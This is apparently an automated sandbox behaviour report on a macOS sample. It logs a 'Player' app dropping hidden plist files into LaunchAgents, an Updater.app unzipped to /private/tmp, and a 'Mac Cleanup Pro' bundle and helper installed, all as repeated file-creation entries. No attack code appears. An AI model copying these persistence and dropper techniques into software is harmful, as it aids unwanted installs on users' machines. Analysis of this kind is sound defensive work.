Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plistJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/Sparkle.stringsJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nibJump to behavior
Source: /bin/cp (PID: 806)Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/SparkleJump to behavior
Source: /bin/cp (PID: 806)Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Resources -> Versions/Current/ResourcesJump to behavior
Source: /bin/cp (PID: 806)Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Sparkle -> Versions/Current/SparkleJump to behavior
Source: /bin/cp (PID: 806)Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr_CA.lproj -> fr.lprojJump to behavior
Source: /bin/cp (PID: 806)Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt.lproj -> pt_BR.lprojJump to behavior
Source: /bin/cp (PID: 806)Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/Current -> AJump to behavior
Creates application bundles containing icon filesShow sources
Source: /bin/cp (PID: 806)Icon file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icnsJump to behavior
Source: /bin/cp (PID: 806)Icon file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/application.icnsJump to behavior
Reads data from the local random generatorShow sources
Source: /usr/bin/osascript (PID: 778)Random device file read: /dev/randomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 778)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes log files to diskShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/v3/active/4080d8ce448e4366aaf6a9a7a957c79d/sdk.logJump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/760C7B8F-7B90-4DE6-B7FE-1CBFF3393F22.logJump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/D9DE1C75-B81F-44E4-82B5-618E9826375D.logJump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/B7A1E2E9-496D-4B11-911D-60BB65A65CFD.logJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)Log file created: /Users/henry/Library/Logs/Mac Cleanup Pro.logJump to dropped file
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)Log file created: /Users/henry/Library/Logs/helpermcp.logJump to dropped file
Writes property list (.plist) files to diskShow sources
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCNJump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qLJump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)XML plist file created: /Users/henry/Library/Application Support/com.l.r.l.m/com.crashlytics/.dat.nosync02ed.j46nBnJump to dropped file
Source: /usr/bin/unzip (PID: 776)XML plist file created: /private/tmp/ddd/Updater.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 776)Binary plist file created: /private/tmp/ddd/Updater.app/Contents/Resources/MainMenu.nibJump to dropped file
Source: /usr/bin/unzip (PID: 776)XML plist file created: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 776)XML plist file created: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 776)XML plist file created: /private/tmp/ddd/Updater.app/Contents/Info.plistJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plistJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plistJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nibJump to dropped file
